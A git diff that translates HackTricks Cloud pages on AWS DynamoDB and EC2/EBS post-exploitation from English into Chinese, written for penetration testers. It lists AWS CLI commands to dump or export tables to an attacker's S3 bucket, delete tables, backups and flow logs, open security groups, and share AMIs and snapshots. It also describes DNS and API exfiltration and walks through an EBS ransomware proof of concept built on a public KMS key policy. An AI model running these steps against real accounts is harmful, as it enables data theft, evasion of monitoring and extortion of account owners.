通过在表中定位敏感信息进行间接权限提升 ### `dynamodb:PartiQLSelect` -You can use this permission to **dump the entire table easily**. - +您可以使用此权限来**轻松导出整个表**。 ```bash aws dynamodb execute-statement \ - --statement "SELECT * FROM ProductCatalog" +--statement "SELECT * FROM ProductCatalog" ``` - -This permission also allow to perform `batch-execute-statement` like: - +此权限还允许执行 `batch-execute-statement`,例如: ```bash aws dynamodb batch-execute-statement \ - --statements '[{"Statement": "SELECT * FROM ProductCatalog WHERE Id = 204"}]' +--statements '[{"Statement": "SELECT * FROM ProductCatalog WHERE Id = 204"}]' ``` +但您需要指定主键及其值,因此这并不是很有用。 -but you need to specify the primary key with a value, so it isn't that useful. - -**Potential Impact:** Indirect privesc by locating sensitive information in the table +**潜在影响:** 通过在表中定位敏感信息进行间接权限提升 ### `dynamodb:ExportTableToPointInTime|(dynamodb:UpdateContinuousBackups)` -This permission will allow an attacker to **export the whole table to a S3 bucket** of his election: - +此权限将允许攻击者**将整个表导出到他选择的 S3 存储桶**: ```bash aws dynamodb export-table-to-point-in-time \ - --table-arn arn:aws:dynamodb:::table/TargetTable \ - --s3-bucket \ - --s3-prefix \ - --export-time \ - --region +--table-arn arn:aws:dynamodb:::table/TargetTable \ +--s3-bucket \ +--s3-prefix \ +--export-time \ +--region ``` - -Note that for this to work the table needs to have point-in-time-recovery enabled, you can check if the table has it with: - +注意,要使其工作,表需要启用时间点恢复,你可以通过以下方式检查表是否启用: ```bash aws dynamodb describe-continuous-backups \ - --table-name +--table-name ``` - -If it isn't enabled, you will need to **enable it** and for that you need the **`dynamodb:ExportTableToPointInTime`** permission: - +如果它没有启用,您需要**启用它**,为此您需要**`dynamodb:ExportTableToPointInTime`**权限: ```bash aws dynamodb update-continuous-backups \ - --table-name \ - --point-in-time-recovery-specification PointInTimeRecoveryEnabled=true +--table-name \ +--point-in-time-recovery-specification PointInTimeRecoveryEnabled=true ``` - -**Potential Impact:** Indirect privesc by locating sensitive information in the table +**潜在影响:** 通过在表中定位敏感信息进行间接权限提升 ### `dynamodb:CreateTable`, `dynamodb:RestoreTableFromBackup`, (`dynamodb:CreateBackup)` -With these permissions, an attacker would be able to **create a new table from a backup** (or even create a backup to then restore it in a different table). Then, with the necessary permissions, he would be able to check **information** from the backups that c**ould not be any more in the production** table. - +拥有这些权限后,攻击者将能够**从备份中创建新表**(甚至可以创建备份,然后在不同的表中恢复它)。然后,凭借必要的权限,他将能够检查**信息**,这些信息**可能不再在生产**表中。 ```bash aws dynamodb restore-table-from-backup \ - --backup-arn \ - --target-table-name \ - --region +--backup-arn \ +--target-table-name \ +--region ``` - -**Potential Impact:** Indirect privesc by locating sensitive information in the table backup +**潜在影响:** 通过定位表备份中的敏感信息进行间接权限提升 ### `dynamodb:PutItem` -This permission allows users to add a **new item to the table or replace an existing item** with a new item. If an item with the same primary key already exists, the **entire item will be replaced** with the new item. If the primary key does not exist, a new item with the specified primary key will be **created**. +此权限允许用户**向表中添加新项或用新项替换现有项**。如果具有相同主键的项已经存在,**整个项将被新项替换**。如果主键不存在,将**创建**一个具有指定主键的新项。 {{#tabs }} {{#tab name="XSS Example" }} - ```bash ## Create new item with XSS payload aws dynamodb put-item --table --item file://add.json ### With add.json: { - "Id": { - "S": "1000" - }, - "Name": { - "S": "Marc" - }, - "Description": { - "S": "" - } +"Id": { +"S": "1000" +}, +"Name": { +"S": "Marc" +}, +"Description": { +"S": "" +} } ``` - {{#endtab }} -{{#tab name="AI Example" }} - +{{#tab name="AI 示例" }} ```bash aws dynamodb put-item \ - --table-name ExampleTable \ - --item '{"Id": {"S": "1"}, "Attribute1": {"S": "Value1"}, "Attribute2": {"S": "Value2"}}' \ - --region +--table-name ExampleTable \ +--item '{"Id": {"S": "1"}, "Attribute1": {"S": "Value1"}, "Attribute2": {"S": "Value2"}}' \ +--region ``` - {{#endtab }} {{#endtabs }} -**Potential Impact:** Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table +**潜在影响:** 通过能够在DynamoDB表中添加/修改数据,利用进一步的漏洞/绕过 ### `dynamodb:UpdateItem` -This permission allows users to **modify the existing attributes of an item or add new attributes to an item**. It does **not replace** the entire item; it only updates the specified attributes. If the primary key does not exist in the table, the operation will **create a new item** with the specified primary key and set the attributes specified in the update expression. +此权限允许用户**修改项目的现有属性或向项目添加新属性**。它并**不替换**整个项目;它仅更新指定的属性。如果主键在表中不存在,则该操作将**创建一个新项目**,并使用指定的主键设置更新表达式中指定的属性。 {{#tabs }} {{#tab name="XSS Example" }} - ```bash ## Update item with XSS payload aws dynamodb update-item --table \ - --key file://key.json --update-expression "SET Description = :value" \ - --expression-attribute-values file://val.json +--key file://key.json --update-expression "SET Description = :value" \ +--expression-attribute-values file://val.json ### With key.json: { - "Id": { - "S": "1000" - } +"Id": { +"S": "1000" +} } ### and val.json { - ":value": { - "S": "" - } +":value": { +"S": "" +} } ``` - {{#endtab }} -{{#tab name="AI Example" }} - +{{#tab name="AI 示例" }} ```bash aws dynamodb update-item \ - --table-name ExampleTable \ - --key '{"Id": {"S": "1"}}' \ - --update-expression "SET Attribute1 = :val1, Attribute2 = :val2" \ - --expression-attribute-values '{":val1": {"S": "NewValue1"}, ":val2": {"S": "NewValue2"}}' \ - --region +--table-name ExampleTable \ +--key '{"Id": {"S": "1"}}' \ +--update-expression "SET Attribute1 = :val1, Attribute2 = :val2" \ +--expression-attribute-values '{":val1": {"S": "NewValue1"}, ":val2": {"S": "NewValue2"}}' \ +--region ``` - {{#endtab }} {{#endtabs }} -**Potential Impact:** Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table +**潜在影响:** 通过能够在DynamoDB表中添加/修改数据,利用进一步的漏洞/绕过。 ### `dynamodb:DeleteTable` -An attacker with this permission can **delete a DynamoDB table, causing data loss**. - +拥有此权限的攻击者可以**删除DynamoDB表,导致数据丢失**。 ```bash aws dynamodb delete-table \ - --table-name TargetTable \ - --region +--table-name TargetTable \ +--region ``` - -**Potential impact**: Data loss and disruption of services relying on the deleted table. +**潜在影响**:数据丢失和依赖于已删除表的服务中断。 ### `dynamodb:DeleteBackup` -An attacker with this permission can **delete a DynamoDB backup, potentially causing data loss in case of a disaster recovery scenario**. - +拥有此权限的攻击者可以**删除DynamoDB备份,可能导致在灾难恢复场景中数据丢失**。 ```bash aws dynamodb delete-backup \ - --backup-arn arn:aws:dynamodb:::table/TargetTable/backup/BACKUP_ID \ - --region +--backup-arn arn:aws:dynamodb:::table/TargetTable/backup/BACKUP_ID \ +--region ``` - -**Potential impact**: Data loss and inability to recover from a backup during a disaster recovery scenario. +**潜在影响**:数据丢失以及在灾难恢复场景中无法从备份中恢复。 ### `dynamodb:StreamSpecification`, `dynamodb:UpdateTable`, `dynamodb:DescribeStream`, `dynamodb:GetShardIterator`, `dynamodb:GetRecords` > [!NOTE] -> TODO: Test if this actually works +> TODO: 测试这是否真的有效 -An attacker with these permissions can **enable a stream on a DynamoDB table, update the table to begin streaming changes, and then access the stream to monitor changes to the table in real-time**. This allows the attacker to monitor and exfiltrate data changes, potentially leading to data leakage. - -1. Enable a stream on a DynamoDB table: +拥有这些权限的攻击者可以**在DynamoDB表上启用流,更新表以开始流式传输更改,然后访问流以实时监控表的更改**。这使攻击者能够监控和提取数据更改,可能导致数据泄露。 +1. 在DynamoDB表上启用流: ```bash bashCopy codeaws dynamodb update-table \ - --table-name TargetTable \ - --stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES \ - --region +--table-name TargetTable \ +--stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES \ +--region ``` - -2. Describe the stream to obtain the ARN and other details: - +2. 描述获取 ARN 和其他详细信息的流: ```bash bashCopy codeaws dynamodb describe-stream \ - --table-name TargetTable \ - --region +--table-name TargetTable \ +--region ``` - -3. Get the shard iterator using the stream ARN: - +3. 使用流 ARN 获取分片迭代器: ```bash bashCopy codeaws dynamodbstreams get-shard-iterator \ - --stream-arn \ - --shard-id \ - --shard-iterator-type LATEST \ - --region +--stream-arn \ +--shard-id \ +--shard-iterator-type LATEST \ +--region ``` - -4. Use the shard iterator to access and exfiltrate data from the stream: - +4. 使用分片迭代器访问并提取流中的数据: ```bash bashCopy codeaws dynamodbstreams get-records \ - --shard-iterator \ - --region +--shard-iterator \ +--region ``` - -**Potential impact**: Real-time monitoring and data leakage of the DynamoDB table's changes. +**潜在影响**:对DynamoDB表更改的实时监控和数据泄露。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md index 9ae6a0a4f..f2068462f 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md @@ -1,30 +1,29 @@ -# AWS - EC2, EBS, SSM & VPC Post Exploitation +# AWS - EC2, EBS, SSM & VPC 后期利用 {{#include ../../../../banners/hacktricks-training.md}} ## EC2 & VPC -For more information check: +有关更多信息,请查看: {{#ref}} ../../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ {{#endref}} -### **Malicious VPC Mirror -** `ec2:DescribeInstances`, `ec2:RunInstances`, `ec2:CreateSecurityGroup`, `ec2:AuthorizeSecurityGroupIngress`, `ec2:CreateTrafficMirrorTarget`, `ec2:CreateTrafficMirrorSession`, `ec2:CreateTrafficMirrorFilter`, `ec2:CreateTrafficMirrorFilterRule` +### **恶意 VPC 镜像 -** `ec2:DescribeInstances`, `ec2:RunInstances`, `ec2:CreateSecurityGroup`, `ec2:AuthorizeSecurityGroupIngress`, `ec2:CreateTrafficMirrorTarget`, `ec2:CreateTrafficMirrorSession`, `ec2:CreateTrafficMirrorFilter`, `ec2:CreateTrafficMirrorFilterRule` -VPC traffic mirroring **duplicates inbound and outbound traffic for EC2 instances within a VPC** without the need to install anything on the instances themselves. This duplicated traffic would commonly be sent to something like a network intrusion detection system (IDS) for analysis and monitoring.\ -An attacker could abuse this to capture all the traffic and obtain sensitive information from it: +VPC 流量镜像 **在 VPC 内复制 EC2 实例的入站和出站流量**,无需在实例上安装任何东西。这些复制的流量通常会发送到网络入侵检测系统 (IDS) 进行分析和监控。\ +攻击者可以利用这一点捕获所有流量并从中获取敏感信息: -For more information check this page: +有关更多信息,请查看此页面: {{#ref}} aws-malicious-vpc-mirror.md {{#endref}} -### Copy Running Instance - -Instances usually contain some kind of sensitive information. There are different ways to get inside (check [EC2 privilege escalation tricks](../../aws-privilege-escalation/aws-ec2-privesc.md)). However, another way to check what it contains is to **create an AMI and run a new instance (even in your own account) from it**: +### 复制运行实例 +实例通常包含某种敏感信息。有不同的方法可以进入(查看 [EC2 权限提升技巧](../../aws-privilege-escalation/aws-ec2-privesc.md))。然而,检查其内容的另一种方法是 **创建一个 AMI 并从中运行一个新实例(甚至在您自己的账户中)**: ```shell # List instances aws ec2 describe-images @@ -48,211 +47,192 @@ aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups " aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 ``` +### EBS 快照转储 -### EBS Snapshot dump - -**Snapshots are backups of volumes**, which usually will contain **sensitive information**, therefore checking them should disclose this information.\ -If you find a **volume without a snapshot** you could: **Create a snapshot** and perform the following actions or just **mount it in an instance** inside the account: +**快照是卷的备份**,通常会包含 **敏感信息**,因此检查它们应该会披露这些信息。\ +如果你发现一个 **没有快照的卷**,你可以:**创建一个快照** 并执行以下操作,或者直接 **在账户内的实例中挂载它**: {{#ref}} aws-ebs-snapshot-dump.md {{#endref}} -### Data Exfiltration +### 数据外泄 -#### DNS Exfiltration +#### DNS 外泄 -Even if you lock down an EC2 so no traffic can get out, it can still **exfil via DNS**. +即使你锁定了 EC2,使其无法发送流量,它仍然可以通过 **DNS 外泄**。 -- **VPC Flow Logs will not record this**. -- You have no access to AWS DNS logs. -- Disable this by setting "enableDnsSupport" to false with: +- **VPC 流日志不会记录此内容**。 +- 你无法访问 AWS DNS 日志。 +- 通过将 "enableDnsSupport" 设置为 false 来禁用此功能: - `aws ec2 modify-vpc-attribute --no-enable-dns-support --vpc-id ` +`aws ec2 modify-vpc-attribute --no-enable-dns-support --vpc-id ` -#### Exfiltration via API calls +#### 通过 API 调用外泄 -An attacker could call API endpoints of an account controlled by him. Cloudtrail will log this calls and the attacker will be able to see the exfiltrate data in the Cloudtrail logs. +攻击者可以调用由他控制的账户的 API 端点。Cloudtrail 将记录这些调用,攻击者将能够在 Cloudtrail 日志中看到外泄的数据。 -### Open Security Group - -You could get further access to network services by opening ports like this: +### 开放安全组 +你可以通过打开端口来进一步访问网络服务,如下所示: ```bash aws ec2 authorize-security-group-ingress --group-id --protocol tcp --port 80 --cidr 0.0.0.0/0 # Or you could just open it to more specific ips or maybe th einternal network if you have already compromised an EC2 in the VPC ``` - ### Privesc to ECS -It's possible to run an EC2 instance an register it to be used to run ECS instances and then steal the ECS instances data. +可以运行一个 EC2 实例并将其注册为用于运行 ECS 实例,然后窃取 ECS 实例的数据。 -For [**more information check this**](../../aws-privilege-escalation/aws-ec2-privesc.md#privesc-to-ecs). +有关更多信息,请查看[**此处**](../../aws-privilege-escalation/aws-ec2-privesc.md#privesc-to-ecs)。 ### Remove VPC flow logs - ```bash aws ec2 delete-flow-logs --flow-log-ids --region ``` +### SSM 端口转发 -### SSM Port Forwarding - -Required permissions: +所需权限: - `ssm:StartSession` -In addition to command execution, SSM allows for traffic tunneling which can be abused to pivot from EC2 instances that do not have network access because of Security Groups or NACLs. -One of the scenarios where this is useful is pivoting from a [Bastion Host](https://www.geeksforgeeks.org/what-is-aws-bastion-host/) to a private EKS cluster. +除了命令执行,SSM 还允许流量隧道,这可以被滥用以从由于安全组或 NACL 而没有网络访问的 EC2 实例进行转发。 +其中一个有用的场景是从 [Bastion Host](https://www.geeksforgeeks.org/what-is-aws-bastion-host/) 转发到私有 EKS 集群。 -> In order to start a session you need the SessionManagerPlugin installed: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html - -1. Install the SessionManagerPlugin on your machine -2. Log in to the Bastion EC2 using the following command: +> 为了开始会话,您需要安装 SessionManagerPlugin: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html +1. 在您的机器上安装 SessionManagerPlugin +2. 使用以下命令登录到 Bastion EC2: ```shell aws ssm start-session --target "$INSTANCE_ID" ``` - -3. Get the Bastion EC2 AWS temporary credentials with the [Abusing SSRF in AWS EC2 environment](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#abusing-ssrf-in-aws-ec2-environment) script -4. Transfer the credentials to your own machine in the `$HOME/.aws/credentials` file as `[bastion-ec2]` profile -5. Log in to EKS as the Bastion EC2: - +3. 使用 [Abusing SSRF in AWS EC2 environment](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#abusing-ssrf-in-aws-ec2-environment) 脚本获取 Bastion EC2 AWS 临时凭证 +4. 将凭证转移到您自己的机器中的 `$HOME/.aws/credentials` 文件,作为 `[bastion-ec2]` 配置文件 +5. 以 Bastion EC2 身份登录 EKS: ```shell aws eks update-kubeconfig --profile bastion-ec2 --region --name ``` - -6. Update the `server` field in `$HOME/.kube/config` file to point to `https://localhost` -7. Create an SSM tunnel as follows: - +6. 更新 `$HOME/.kube/config` 文件中的 `server` 字段,指向 `https://localhost` +7. 创建一个 SSM 隧道,如下所示: ```shell sudo aws ssm start-session --target $INSTANCE_ID --document-name AWS-StartPortForwardingSessionToRemoteHost --parameters '{"host":[""],"portNumber":["443"], "localPortNumber":["443"]}' --region ``` - -8. The traffic from the `kubectl` tool is now forwarded throug the SSM tunnel via the Bastion EC2 and you can access the private EKS cluster from your own machine by running: - +8. 现在,来自 `kubectl` 工具的流量通过 Bastion EC2 通过 SSM 隧道转发,您可以通过运行以下命令从自己的机器访问私有 EKS 集群: ```shell kubectl get pods --insecure-skip-tls-verify ``` +注意,SSL 连接将失败,除非您设置 `--insecure-skip-tls-verify` 标志(或其在 K8s 审计工具中的等效项)。由于流量通过安全的 AWS SSM 隧道进行隧道传输,您可以免受任何类型的中间人攻击。 -Note that the SSL connections will fail unless you set the `--insecure-skip-tls-verify ` flag (or its equivalent in K8s audit tools). Seeing that the traffic is tunnelled through the secure AWS SSM tunnel, you are safe from any sort of MitM attacks. - -Finally, this technique is not specific to attacking private EKS clusters. You can set arbitrary domains and ports to pivot to any other AWS service or a custom application. - -### Share AMI +最后,这种技术并不特定于攻击私有 EKS 集群。您可以设置任意域和端口,以便转向任何其他 AWS 服务或自定义应用程序。 +### 分享 AMI ```bash aws ec2 modify-image-attribute --image-id --launch-permission "Add=[{UserId=}]" --region ``` +### 在公共和私有 AMI 中搜索敏感信息 -### Search sensitive information in public and private AMIs - -- [https://github.com/saw-your-packet/CloudShovel](https://github.com/saw-your-packet/CloudShovel): CloudShovel is a tool designed to **search for sensitive information within public or private Amazon Machine Images (AMIs)**. It automates the process of launching instances from target AMIs, mounting their volumes, and scanning for potential secrets or sensitive data. - -### Share EBS Snapshot +- [https://github.com/saw-your-packet/CloudShovel](https://github.com/saw-your-packet/CloudShovel): CloudShovel 是一个旨在 **在公共或私有 Amazon Machine Images (AMIs) 中搜索敏感信息** 的工具。它自动化了从目标 AMI 启动实例、挂载其卷以及扫描潜在秘密或敏感数据的过程。 +### 共享 EBS 快照 ```bash aws ec2 modify-snapshot-attribute --snapshot-id --create-volume-permission "Add=[{UserId=}]" --region ``` - ### EBS Ransomware PoC -A proof of concept similar to the Ransomware demonstration demonstrated in the S3 post-exploitation notes. KMS should be renamed to RMS for Ransomware Management Service with how easy it is to use to encrypt various AWS services using it. - -First from an 'attacker' AWS account, create a customer managed key in KMS. For this example we'll just have AWS manage the key data for me, but in a realistic scenario a malicious actor would retain the key data outside of AWS' control. Change the key policy to allow for any AWS account Principal to use the key. For this key policy, the account's name was 'AttackSim' and the policy rule allowing all access is called 'Outside Encryption' +一个类似于在 S3 后渗透笔记中演示的勒索软件演示的概念验证。KMS 应该被重新命名为 RMS(勒索软件管理服务),因为使用它加密各种 AWS 服务是如此简单。 +首先,从一个“攻击者”的 AWS 账户中,在 KMS 中创建一个客户管理的密钥。在这个例子中,我们将让 AWS 为我管理密钥数据,但在现实场景中,恶意行为者会将密钥数据保留在 AWS 控制之外。更改密钥策略以允许任何 AWS 账户主体使用该密钥。对于这个密钥策略,账户的名称是 'AttackSim',允许所有访问的策略规则称为 'Outside Encryption'。 ``` { - "Version": "2012-10-17", - "Id": "key-consolepolicy-3", - "Statement": [ - { - "Sid": "Enable IAM User Permissions", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::[Your AWS Account Id]:root" - }, - "Action": "kms:*", - "Resource": "*" - }, - { - "Sid": "Allow access for Key Administrators", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" - }, - "Action": [ - "kms:Create*", - "kms:Describe*", - "kms:Enable*", - "kms:List*", - "kms:Put*", - "kms:Update*", - "kms:Revoke*", - "kms:Disable*", - "kms:Get*", - "kms:Delete*", - "kms:TagResource", - "kms:UntagResource", - "kms:ScheduleKeyDeletion", - "kms:CancelKeyDeletion" - ], - "Resource": "*" - }, - { - "Sid": "Allow use of the key", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" - }, - "Action": [ - "kms:Encrypt", - "kms:Decrypt", - "kms:ReEncrypt*", - "kms:GenerateDataKey*", - "kms:DescribeKey" - ], - "Resource": "*" - }, - { - "Sid": "Outside Encryption", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": [ - "kms:Encrypt", - "kms:Decrypt", - "kms:ReEncrypt*", - "kms:GenerateDataKey*", - "kms:DescribeKey", - "kms:GenerateDataKeyWithoutPlainText", - "kms:CreateGrant" - ], - "Resource": "*" - }, - { - "Sid": "Allow attachment of persistent resources", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" - }, - "Action": [ - "kms:CreateGrant", - "kms:ListGrants", - "kms:RevokeGrant" - ], - "Resource": "*", - "Condition": { - "Bool": { - "kms:GrantIsForAWSResource": "true" - } - } - } - ] +"Version": "2012-10-17", +"Id": "key-consolepolicy-3", +"Statement": [ +{ +"Sid": "Enable IAM User Permissions", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::[Your AWS Account Id]:root" +}, +"Action": "kms:*", +"Resource": "*" +}, +{ +"Sid": "Allow access for Key Administrators", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" +}, +"Action": [ +"kms:Create*", +"kms:Describe*", +"kms:Enable*", +"kms:List*", +"kms:Put*", +"kms:Update*", +"kms:Revoke*", +"kms:Disable*", +"kms:Get*", +"kms:Delete*", +"kms:TagResource", +"kms:UntagResource", +"kms:ScheduleKeyDeletion", +"kms:CancelKeyDeletion" +], +"Resource": "*" +}, +{ +"Sid": "Allow use of the key", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" +}, +"Action": [ +"kms:Encrypt", +"kms:Decrypt", +"kms:ReEncrypt*", +"kms:GenerateDataKey*", +"kms:DescribeKey" +], +"Resource": "*" +}, +{ +"Sid": "Outside Encryption", +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": [ +"kms:Encrypt", +"kms:Decrypt", +"kms:ReEncrypt*", +"kms:GenerateDataKey*", +"kms:DescribeKey", +"kms:GenerateDataKeyWithoutPlainText", +"kms:CreateGrant" +], +"Resource": "*" +}, +{ +"Sid": "Allow attachment of persistent resources", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" +}, +"Action": [ +"kms:CreateGrant", +"kms:ListGrants", +"kms:RevokeGrant" +], +"Resource": "*", +"Condition": { +"Bool": { +"kms:GrantIsForAWSResource": "true" +} +} +} +] } ``` - -The key policy rule needs the following enabled to allow for the ability to use it to encrypt an EBS volume: +密钥策略规则需要启用以下内容,以便能够使用它来加密 EBS 卷: - `kms:CreateGrant` - `kms:Decrypt` @@ -260,222 +240,214 @@ The key policy rule needs the following enabled to allow for the ability to use - `kms:GenerateDataKeyWithoutPlainText` - `kms:ReEncrypt` -Now with the publicly accessible key to use. We can use a 'victim' account that has some EC2 instances spun up with unencrypted EBS volumes attached. This 'victim' account's EBS volumes are what we're targeting for encryption, this attack is under the assumed breach of a high-privilege AWS account. +现在可以使用公开可访问的密钥。我们可以使用一个“受害者”账户,该账户有一些 EC2 实例启动,并附加了未加密的 EBS 卷。这个“受害者”账户的 EBS 卷是我们加密的目标,这次攻击是在假设高权限 AWS 账户被攻破的情况下进行的。 ![Pasted image 20231231172655](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/5b9a96cd-6006-4965-84a4-b090456f90c6) ![Pasted image 20231231172734](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/4294289c-0dbd-4eb6-a484-60b4e4266459) -Similar to the S3 ransomware example. This attack will create copies of the attached EBS volumes using snapshots, use the publicly available key from the 'attacker' account to encrypt the new EBS volumes, then detach the original EBS volumes from the EC2 instances and delete them, and then finally delete the snapshots used to create the newly encrypted EBS volumes. ![Pasted image 20231231173130](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/34808990-2b3b-4975-a523-8ee45874279e) +类似于 S3 勒索软件的例子。这次攻击将使用快照创建附加 EBS 卷的副本,使用“攻击者”账户中的公开可用密钥加密新的 EBS 卷,然后从 EC2 实例中分离并删除原始 EBS 卷,最后删除用于创建新加密 EBS 卷的快照。 ![Pasted image 20231231173130](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/34808990-2b3b-4975-a523-8ee45874279e) -This results in only encrypted EBS volumes left available in the account. +这导致账户中只剩下加密的 EBS 卷。 ![Pasted image 20231231173338](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/eccdda58-f4b1-44ea-9719-43afef9a8220) -Also worth noting, the script stopped the EC2 instances to detach and delete the original EBS volumes. The original unencrypted volumes are gone now. +还值得注意的是,脚本停止了 EC2 实例,以分离和删除原始 EBS 卷。原始未加密的卷现在已经消失。 ![Pasted image 20231231173931](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/cc31a5c9-fbb4-4804-ac87-911191bb230e) -Next, return to the key policy in the 'attacker' account and remove the 'Outside Encryption' policy rule from the key policy. - +接下来,返回“攻击者”账户中的密钥策略,并从密钥策略中删除“外部加密”策略规则。 ```json { - "Version": "2012-10-17", - "Id": "key-consolepolicy-3", - "Statement": [ - { - "Sid": "Enable IAM User Permissions", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::[Your AWS Account Id]:root" - }, - "Action": "kms:*", - "Resource": "*" - }, - { - "Sid": "Allow access for Key Administrators", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" - }, - "Action": [ - "kms:Create*", - "kms:Describe*", - "kms:Enable*", - "kms:List*", - "kms:Put*", - "kms:Update*", - "kms:Revoke*", - "kms:Disable*", - "kms:Get*", - "kms:Delete*", - "kms:TagResource", - "kms:UntagResource", - "kms:ScheduleKeyDeletion", - "kms:CancelKeyDeletion" - ], - "Resource": "*" - }, - { - "Sid": "Allow use of the key", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" - }, - "Action": [ - "kms:Encrypt", - "kms:Decrypt", - "kms:ReEncrypt*", - "kms:GenerateDataKey*", - "kms:DescribeKey" - ], - "Resource": "*" - }, - { - "Sid": "Allow attachment of persistent resources", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" - }, - "Action": ["kms:CreateGrant", "kms:ListGrants", "kms:RevokeGrant"], - "Resource": "*", - "Condition": { - "Bool": { - "kms:GrantIsForAWSResource": "true" - } - } - } - ] +"Version": "2012-10-17", +"Id": "key-consolepolicy-3", +"Statement": [ +{ +"Sid": "Enable IAM User Permissions", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::[Your AWS Account Id]:root" +}, +"Action": "kms:*", +"Resource": "*" +}, +{ +"Sid": "Allow access for Key Administrators", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" +}, +"Action": [ +"kms:Create*", +"kms:Describe*", +"kms:Enable*", +"kms:List*", +"kms:Put*", +"kms:Update*", +"kms:Revoke*", +"kms:Disable*", +"kms:Get*", +"kms:Delete*", +"kms:TagResource", +"kms:UntagResource", +"kms:ScheduleKeyDeletion", +"kms:CancelKeyDeletion" +], +"Resource": "*" +}, +{ +"Sid": "Allow use of the key", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" +}, +"Action": [ +"kms:Encrypt", +"kms:Decrypt", +"kms:ReEncrypt*", +"kms:GenerateDataKey*", +"kms:DescribeKey" +], +"Resource": "*" +}, +{ +"Sid": "Allow attachment of persistent resources", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" +}, +"Action": ["kms:CreateGrant", "kms:ListGrants", "kms:RevokeGrant"], +"Resource": "*", +"Condition": { +"Bool": { +"kms:GrantIsForAWSResource": "true" +} +} +} +] } ``` - -Wait a moment for the newly set key policy to propagate. Then return to the 'victim' account and attempt to attach one of the newly encrypted EBS volumes. You'll find that you can attach the volume. +等待新设置的密钥策略传播。然后返回到“受害者”账户,尝试附加一个新加密的EBS卷。你会发现你可以附加该卷。 ![Pasted image 20231231174131](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/ba9e5340-7020-4af9-95cc-0e02267ced47) ![Pasted image 20231231174258](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/6c3215ec-4161-44e2-b1c1-e32f43ad0fa4) -But when you attempt to actually start the EC2 instance back up with the encrypted EBS volume it'll just fail and go from the 'pending' state back to the 'stopped' state forever since the attached EBS volume can't be decrypted using the key since the key policy no longer allows it. +但是当你尝试实际启动带有加密EBS卷的EC2实例时,它将失败,并且会从“待处理”状态永远返回到“已停止”状态,因为附加的EBS卷无法使用密钥解密,因为密钥策略不再允许。 ![Pasted image 20231231174322](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/73456c22-0828-4da9-a737-e4d90fa3f514) ![Pasted image 20231231174352](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/4d83a90e-6fa9-4003-b904-a4ba7f5944d0) -This the python script used. It takes AWS creds for a 'victim' account and a publicly available AWS ARN value for the key to be used for encryption. The script will make encrypted copies of ALL available EBS volumes attached to ALL EC2 instances in the targeted AWS account, then stop every EC2 instance, detach the original EBS volumes, delete them, and finally delete all the snapshots utilized during the process. This will leave only encrypted EBS volumes in the targeted 'victim' account. ONLY USE THIS SCRIPT IN A TEST ENVIRONMENT, IT IS DESTRUCTIVE AND WILL DELETE ALL THE ORIGINAL EBS VOLUMES. You can recover them using the utilized KMS key and restore them to their original state via snapshots, but just want to make you aware that this is a ransomware PoC at the end of the day. - +这是使用的python脚本。它获取“受害者”账户的AWS凭证和用于加密的公开可用AWS 